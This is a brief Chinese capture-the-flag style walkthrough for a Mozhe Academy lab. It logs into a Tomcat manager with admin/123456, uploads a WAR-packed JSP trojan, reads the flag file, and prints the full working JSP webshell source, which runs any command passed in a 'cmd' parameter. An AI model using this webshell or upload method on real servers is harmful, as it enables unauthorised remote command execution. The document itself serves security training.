墨者学院-Tomcat后台弱口令漏洞利用

靶场地址:
https://www.mozhe.cn/bug/detail/N3U3NER2eHVmQjgvQndWWTNPS1NZUT09bW96aGUmozhe

弱口令登录 admin/123456

将jsp木马压缩,修改后缀为war,上传


墨者学院-Tomcat后台弱口令漏洞利用_第1张图片

上传成功后测试webshell


执行ls命令


墨者学院-Tomcat后台弱口令漏洞利用_第2张图片

执行cat key_xxx.php 在源码处查看key


jsp木马代码:

<%
  String cmd = request.getParameter("cmd");
  out.print(cmd);
  java.io.InputStream in=Runtime.getRuntime().exec(cmd).getInputStream();
  int a = -1;
  byte[] b = new byte[2048];
  out.print("
");
  while((a=in.read(b))!=-1)
  {
      out.println(new String(b));
  }
  out.print("
"); %>

你可能感兴趣的:(墨者学院-Tomcat后台弱口令漏洞利用)